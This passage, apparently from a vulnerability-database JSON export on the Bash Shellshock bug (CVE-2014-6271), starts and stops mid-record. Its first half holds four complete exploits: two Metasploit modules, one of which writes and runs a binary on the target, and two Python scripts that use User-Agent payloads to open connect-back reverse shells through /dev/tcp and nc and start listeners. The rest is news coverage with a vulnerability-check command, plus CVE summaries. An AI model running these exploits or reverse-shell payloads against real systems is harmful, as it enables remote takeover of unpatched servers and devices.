"Advantech Switch Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2015-12-02T00:00:00", "id": "PACKETSTORM:134594", "href": "https://packetstormsecurity.com/files/134594/Advantech-Switch-Bash-Environment-Variable-Code-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)', \n'Description' => %q{ \nThis module exploits the Shellshock vulnerability, a flaw in how the Bash shell \nhandles external environment variables. This module targets the 'ping.sh' CGI \nscript, acessible through the Boa web server on Advantech switches. This module \nwas tested against firmware version 1322_D1.98. \n}, \n'Author' => 'hdm', \n'References' => [ \n['CVE', '2014-6271'], \n['CWE', '94'], \n['OSVDB', '112004'], \n['EDB', '34765'], \n['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'], \n['URL', 'https://access.redhat.com/articles/1200223'], \n['URL', 'http://seclists.org/oss-sec/2014/q3/649'] \n], \n'Privileged' => false, \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\\x0A\\x0D\", \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'openssl generic' \n} \n}, \n'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]], \n'DefaultTarget' => 0, \n'License' => MSF_LICENSE, \n'DisclosureDate' => 'Dec 01 2015' \n)) \nregister_options([ \nOpt::RPORT(80) \n], self.class) \nend \n \n# \n# CVE-2014-6271 \n# \ndef cve_2014_6271(cmd) \n%{() { :;}; $(#{cmd}) & } \nend \n \n# \n# Check credentials \n# \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => '/cgi-bin/ping.sh' \n) \nif !res \nvprint_error(\"#{peer} - No response from host\") \nreturn Exploit::CheckCode::Unknown \nelsif res.headers['Server'] =~ /Boa\\/(.*)/ \nvprint_status(\"#{peer} - Found Boa version #{$1}\") \nelse \nprint_status(\"#{peer} - Target is not a Boa web server\") \nreturn Exploit::CheckCode::Safe \nend \n \nif res.body.to_s.index('127.0.0.1 ping statistics') \nreturn Exploit::CheckCode::Detected \nelse \nvprint_error(\"#{peer} - Target does not appear to be an Advantech switch\") \nreturn Expoit::CheckCode::Safe \nend \nend \n \n# \n# Exploit \n# \ndef exploit \ncmd = cve_2014_6271(payload.encoded) \nvprint_status(\"#{peer} - Trying to run command '#{cmd}'\") \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => '/cgi-bin/ping.sh', \n'agent' => cmd \n) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134594/advantech_switch_bash_env_exec.rb.txt"}, {"lastseen": "2016-12-05T22:13:54", "description": "", "cvss3": {}, "published": "2016-10-22T00:00:00", "type": "packetstorm", "title": "TrendMicro InterScan Web Security Virtual Appliance Shellshock", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2016-10-22T00:00:00", "id": "PACKETSTORM:139304", "href": "https://packetstormsecurity.com/files/139304/TrendMicro-InterScan-Web-Security-Virtual-Appliance-Shellshock.html", "sourceData": "`#!/usr/bin/env python \n# TrendMicro InterScan Web Security Virtul Appliance \n# ================================================== \n# InterScan Web Security is a software virtual appliance that \n# dynamically protects against the ever-growing flood of web \n# threats at the Internet gateway exclusively designed to secure \n# you against traditional and emerging web threats at the Internet \n# gateway. The appliance however is shipped with a vulnerable \n# version of Bash susceptible to shellshock (I know right?). An \n# attacker can exploit this vulnerability by calling the CGI \n# shellscript \"/cgi-bin/cgiCmdNotify\" which can be exploited \n# to perform arbitrary code execution. A limitation of this \n# vulnerability is that the attacker must have credentials for \n# the admin web interface to exploit this flaw. The panel runs \n# over HTTP by default so a man-in-the-middle attack could be \n# used to gain credentials and compromise the appliance. \n# \n# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1 \n# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit \n# [-] Authenticating to '192.168.56.101' with 'admin' 'password' \n# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA \n# [-] exploiting shellshock CVE-2014-6271... \n# bash: no job control in this shell \n# bash-4.1$ id \n# uid=498(iscan) gid=499(iscan) groups=499(iscan) \n# \n# -- Hacker Fantastic \n# \n# (https://www.myhackerhouse.com) \nimport SimpleHTTPServer \nimport subprocess \nimport requests \nimport sys \nimport os \n \ndef spawn_listener(): \nos.system(\"nc -l 8080\") \n \ndef shellshock(ip,session,cbip): \nuser_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'} \ncookies = {'JSESSIONID': session} \nprint \"[-] exploiting shellshock CVE-2014-6271...\" \nmyreq = requests.get(\"http://\"+ip+\":1812/cgi-bin/cgiCmdNotify\", headers = user_agent, cookies = cookies) \n \ndef login_http(ip,user,password): \nmydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'} \nprint \"[-] Authenticating to '%s' with '%s' '%s'\" % (ip,user,password) \nmyreq = requests.post(\"http://\"+ip+\":1812/uilogonsubmit.jsp\", data=mydata) \nsession_cookie = myreq.history[0].cookies.get('JSESSIONID') \nprint \"[-] JSESSIONID = %s\" % session_cookie \nreturn session_cookie \n \nif __name__ == \"__main__\": \nprint \"[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit\" \nif len(sys.argv) < 5: \nprint \"[-] use with <ip> <user> <pass> <connectback_ip>\" \nsys.exit() \nnewRef=os.fork() \nif newRef==0: \nspawn_listener() \nelse: \nsession = login_http(sys.argv[1],sys.argv[2],sys.argv[3]) \nshellshock(sys.argv[1],session,sys.argv[4]) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139304/trendmicro_IWSVA_shellshock.py.txt"}, {"lastseen": "2016-12-20T02:03:32", "description": "", "cvss3": {}, "published": "2016-12-19T00:00:00", "type": "packetstorm", "title": "RSSMON / BEAM (Red Star OS 3.0) Shellshock", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2016-12-19T00:00:00", "id": "PACKETSTORM:140205", "href": "https://packetstormsecurity.com/files/140205/RSSMON-BEAM-Red-Star-OS-3.0-Shellshock.html", "sourceData": "`#!/usr/bin/env python \n# RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit \n# ======================================================== \n# BEAM & RSSMON are Webmin based configuration utilities \n# that ship with RSS server 3.0. These packages are the \n# recommended GUI configuration components and listen on \n# a user specified port from 10000/tcp to 65535/tcp. They \n# are accessible on the local host only in vanilla install \n# unless the firewall is disabled. Both services run with \n# full root permissions and can be exploited for LPE or \n# network attacks. RSSMON has hardened SELinux policies \n# applied which hinder exploitation of this vulnerability \n# be limiting access to network resources. Commands are \n# still run as root in a blind way. \n# \n# $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080 \n# [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit \n# [-] exploiting shellshock CVE-2014-6271... \n# sh: no job control in this shell \n# sh-4.1# id \n# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023 \n# sh-4.1# \n# \n# -- Hacker Fantastic (https://myhackerhouse.com) \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nimport subprocess \nimport requests \nimport sys \nimport os \n \ndef spawn_shell(cbport): \nsubprocess.call('nc -l ' + cbport, shell=True) \n \ndef shellshock(soft,ip,port,cbip,cbport): \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nif soft == \"beam\": \nuser_agent = {'User-agent': '() { :; }; /bin/bash -c \"rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f\"'} \nelse: \nshellstring = '() { :; }; /bin/bash -c \"%s\"' % (cbip) \nuser_agent = {'User-agent': shellstring} \nprint \"[-] exploiting shellshock CVE-2014-6271...\" \nmyreq = requests.get(\"https://\"+ip+\":\"+port+\"/session_login.cgi\", headers = user_agent, verify=False) \n \nif __name__ == \"__main__\": \nprint \"[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit\" \nif len(sys.argv) < 5: \nprint \"[-] Use with <beam> <host> <port> <connectback ip> <connectback port>\" \nprint \"[-] Or with <rssmon> <host> <port> <cmd>\" \nsys.exit() \nif(sys.argv[1]==\"beam\"): \nnewRef=os.fork() \nif newRef==0: \nshellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5]) \nelse: \nspawn_shell(sys.argv[5]) \nelse: \nshellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140205/rsshellshock.py.txt"}, {"lastseen": "2016-12-05T22:14:09", "description": "", "cvss3": {}, "published": "2014-10-03T00:00:00", "type": "packetstorm", "title": "Shellshock Bashed CGI RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2014-10-03T00:00:00", "id": "PACKETSTORM:128554", "href": "https://packetstormsecurity.com/files/128554/Shellshock-Bashed-CGI-RCE.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Shellshock Bashed CGI RCE', \n'Description' => %q{ \nThis module exploits the shellshock vulnerability in apache cgi. It allows you to \nexcute any metasploit payload you want. \n}, \n'Author' => \n[ \n'Stephane Chazelas', # vuln discovery \n'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-6271' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\", \n}, \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Targets' => \n[ \n[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Aug 13 2014')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) , \nOptString.new('FILEPATH', [true, 'The url ', '/tmp']) \n], self.class) \nend \n \ndef exploit \n@payload_name = \"#{rand_text_alpha(5)}\" \nfull_path = datastore['FILEPATH'] + '/' + @payload_name \npayload_exe = generate_payload_exe \nif payload_exe.blank? \nfail_with(Failure::BadConfig, \"#{peer} - Failed to generate the ELF, select a native payload\") \nend \npeer = \"#{rhost}:#{rport}\" \nprint_status(\"#{peer} - Creating payload #{full_path}\") \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => datastore['TARGETURI'], \n'agent' => \"() { :;}; /bin/bash -c \\\"\" + \"printf \" + \"\\'\" + Rex::Text.hexify(payload_exe).gsub(\"\\n\",'') + \"\\'\" + \"> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\\\"\" \n}) \nend \nend`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128554/shellshock_rce.rb.txt"}], "thn": [{"lastseen": "2018-01-27T10:07:05", "description": "[](<https://4.bp.blogspot.com/-eVb9SURqAUA/VCZfla7DcDI/AAAAAAAAge4/jxEUhn1kdWY/s1600/Shellshock-Bash-Vulnerability-exploit.jpg>)\n\nResearchers on Thursday discovered a critical remotely exploitable vulnerability in the widely used command-line shell GNU Bourne Again Shell (**Bash**), dubbed \"[Shellshock](<https://thehackernews.com/2014/09/bash-shell-vulnerability-shellshock.html>)\" which affects most of the Linux distributions and servers worldwide, and may already have been exploited in the wild to take over Web servers as part of a [botnet](<https://thehackernews.com/search/label/botnet>) that is currently trying to infect other servers as well.\n\n \n**BOTNET ATTACK IN THE WILD**\n\nThe bot was discovered by the security researcher with the Twitter handle **_@yinettesys_**, who reported it on [Github](<https://gist.github.com/anonymous/929d622f3b36b00c0be1>) and said it appeared to be remotely controlled by miscreants, which indicates that the vulnerability is already being used maliciously by the hackers.\n\n \n\n\nThe vulnerability **_(CVE-2014-6271)_**, which came to light on Wednesday, affects versions 1.14 through 4.3 of GNU Bash and could become a dangerous threat to Linux/Unix and Apple users if the patches to BASH are not applied to the operating systems. \n\n \n\n\nHowever, the patches for the vulnerability were released but there was some concern that the initial fix for the issue still left Bash vulnerable to attack, according to a new [US CERT](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>) National Vulnerability Database entry. There is as of yet no official patch that completely addresses both vulnerabilities, including the second, which allows an attacker to overwrite files on the targeted system. \n \n**SHELLSHOCK vs THE INTERNET**\n\n_Robert Graham_ of _Errata Security _observed that the major internet scan is already being used by the cyber criminals in order to locate vulnerable servers for cyber attack. During a scan, Graham found about 3,000 servers that were vulnerable \"_just on port 80_\" \u2014 the Internet Protocol port used for normal Web Hypertext Transfer Protocol (HTTP) requests. \n\n \n\n\nThe Internet scan broke after a short while, which means that there could be a wide numbers of other servers vulnerable to the attack.\n\n> \"_It's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi),_\" Graham wrote in a [blog post](<http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html#.VCY8B_nSlcp>). \"_Getting just the root page is the thing least likely to be vulnerable. Spidering the site and testing well-known CGI scripts (like the CPanel one) would give a lot more results\u2014at least 10x_.\"\n\n> In addition, Graham said, \"_this thing is clearly wormable and can easily worm past firewalls and infect lots of systems. One key question is whether Mac OS X and iPhone DHCP service is vulnerable\u2014once the worm gets behind a firewall and runs a hostile DHCP server, that would be 'game over' for large networks._\"\n\n \n**32 ORACLE PRODUCTS VULNERABLE** \nOracle has also confirmed that over 32 of its products are affected by the \"Shellshock\" vulnerability including some expensive integrated hardware systems of the company. The company warned its users to wait a bit longer for the complete patch, by issuing a security alert regarding the Bash bug on Friday. \n\n\n> \"_Oracle is still investigating this issue and will provide fixes for affected products as soon as they have been fully tested and determined to provide effective mitigation against the vulnerability,_\" the company [said](<http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html>). \n\n**PATCH ISSUED, BUT INCOMPLETE** \nPatches were released from most of the Linux distributions, but Red Hat has updated an [advisory ](<https://access.redhat.com/articles/1200223>)warning that the patch is incomplete, the same issue that was also raised by infosec community on Twitter.\n\n> \"_Red Hat has become aware that the patches shipped for this issue are incomplete,_\" said Red Hat security engineer Huzaifa Sidhpurwala. \"_An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions The new issue has been assigned CVE-2014-7169._\"\n\nAlthough people are urged to apply the released patch to thwart most attacks on the affected systems, another patch is expected to release as soon as possible.\n", "cvss3": {}, "published": "2014-09-26T20:07:00", "type": "thn", "title": "Hackers Using 'Shellshock' Bash Vulnerability to Launch Botnet Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-09-27T07:07:32", "id": "THN:491E94A14CDEFCFFF9753033F61D1E0E", "href": "https://thehackernews.com/2014/09/Shellshock-Bash-Vulnerability-exploit.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:07:04", "description": "[](<https://1.bp.blogspot.com/-VQ8KDBhjMDM/VCPBgN-AVvI/AAAAAAAAgd8/TLel5x_Xmeo/s1600/bash-shellshock.png>)\n\nA Critical remotely exploitable vulnerability has been discovered in the widely used Linux and Unix command-line shell, known as **Bash**, aka the GNU **Bourne Again Shell**, leaving countless websites, servers, PCs, OS X Macs, various home routers, and many more open to the cyber criminals.\n\n \n\n\nEarlier today, _Stephane Chazelas_ publicly disclosed the technical details of the [**_remote code execution_** vulnerability](<https://thehackernews.com/search/label/remote%20code%20execution>) in Bash which affects most of the Linux distributions and servers worldwide.\n\n \n\n\n**REMOTELY EXPLOITABLE SHELLSHOCK**\n\nThe vulnerability **(CVE-2014-6271)** affects versions 1.14 through 4.3 of GNU Bash and being named as **Bash Bug**, and **Shellshock** by the Security researchers on the Internet discussions. \n\n \n\n\nAccording to the technical details, a hacker could exploit this bash bug to execute shell commands remotely on a target machine using specifically crafted variables. \u201c_In many common configurations, this vulnerability is exploitable over the network,_\u201d Stephane said.\n\n \n\n\nThis 22-year-old vulnerability stems from the way bash handles specially-formatted environment variables, namely exported shell functions. When assigning a function to a variable, trailing code in the function definition will be executed.\n\n \n\n\n**BASH BUG AFFECTS MILLIONS OF SYSTEMS**\n\nWhile bash is not directly used by remote users, but it is a common shell for evaluating and executing commands from other programs, such as web server or the mail server. So if an application calls the Bash shell command via web HTTP or a _Common-Gateway Interface (CGI)_ in a way that allows a user to insert data, the web server could be hacked.\n\n \n\n\nIn Simple words, If Bash has been configured as the default system shell, an attacker could launch malicious code on the server just by sending a specially crafted malicious web request by setting headers in a web request, or by setting weird mime types. [Proof-of-concept code](<https://pastebin.com/raw.php?i=166f8Rjx>) for cgi-bin reverse shell has been posted on the Internet.\n\n> Similar attacks are possible via OpenSSH, \u201c_We have also verified that this vulnerability is exposed in ssh\u2014but only to authenticated sessions. Web applications like cgi-scripts may be vulnerable based on a number of factors; including calling other applications through a shell, or evaluating sections of code through a shell_.\u201d Stephane warned. But if an attacker does not have an SSH account this exploit would not work.\n\nThis is a serious risk to Internet infrastructure, just like Heartbleed bug, because Linux not only runs the majority of the servers but also large number of embedded devices, including Mac OS X laptops and Android devices are also running the vulnerable version of bash Software. NIST [vulnerability database](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>) has rated this vulnerability \u201c_10 out of 10_\u201d in terms of severity.\n\n \n\n\n**HOW TO CHECK FOR VULNERABLE SHELL**\n\nTo determine if a Linux or Unix system is vulnerable, run the following command lines in your linux shell:\n\n> * env X=\"() { :;} ; echo shellshock\" /bin/sh -c \"echo completed\"\n> * env X=\"() { :;} ; echo shellshock\" `which bash` -c \"echo completed\"\n\nIf you see the words \"_shellshock_\" in the output, errrrr\u2026 then you are at risk.\n\n \n\n\n**BASH BUG PATCH**\n\nYou are recommended to disable any CGI scripts that call on the shell, but it does not fully mitigate the vulnerability. Many of the major operating system and Linux distribution vendors have released the new bash software versions today, including:\n\n \n\n\n * Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution\n * [CentOS](<http://lists.centos.org/pipermail/centos/2014-September/146099.html>) (versions 5 through 7)\n * [Ubuntu](<https://www.ubuntu.com/usn/usn-2362-1/>) 10.04 LTS, 12.04 LTS, and 14.04 LTS\n * [Debian](<https://lists.debian.org/debian-security-announce/2014/msg00220.html>)\n\nIf your system is vulnerable to bash bug, then you are highly recommended to upgrade your bash software package as soon as possible.\n", "cvss3": {}, "published": "2014-09-24T20:19:00", "type": "thn", "title": "Remotely Exploitable 'Bash Shell' Vulnerability Affects Linux, Unix and Apple Mac OS X", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2014-09-25T07:19:29", "id": "THN:1859301C4A1DFB7CAC529CC0D8AA84DD", "href": "https://thehackernews.com/2014/09/bash-shell-vulnerability-shellshock.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2023-10-01T09:52:28", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-25T00:00:00", "type": "attackerkb", "title": "CVE-2014-7169", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2020-06-05T00:00:00", "id": "AKB:D0ACE522-D43F-4688-92FE-CFF1799B4890", "href": "https://attackerkb.com/topics/GF2Rtrz9n4/cve-2014-7169", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T09:33:35", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-27T00:00:00", "type": "attackerkb", "title": "CVE-2014-6277", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-7169"], "modified": "2020-06-05T00:00:00", "id": "AKB:26BDFAC3-8C29-40D1-B3A7-C26249A3B4D7", "href": "https://attackerkb.com/topics/Sj4QBtPdUu/cve-2014-6277", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T09:52:56", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \u201cShellShock.\u201d NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.\n\n \n**Recent assessments:** \n \n**h00die-gr3y** at May 21, 2023 3:28pm UTC reported:\n\nAn `Golden Oldie` from 2014 that is still very relevant nowadays.\n\nIn my recent research of security vulnerabilities, I bumped into several targets that were still vulnerable to [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>) a.k.a. `Shellshock` and [CVE-2014-6278](<https://nvd.nist.gov/vuln/detail/CVE-2014-6278>). You should not be surprised that most of these targets are IoT based with an embedded Linux/Unix image running a vulnerable `bash` version. They typically do not get updated at all and are easy targets for a malicious actor to fi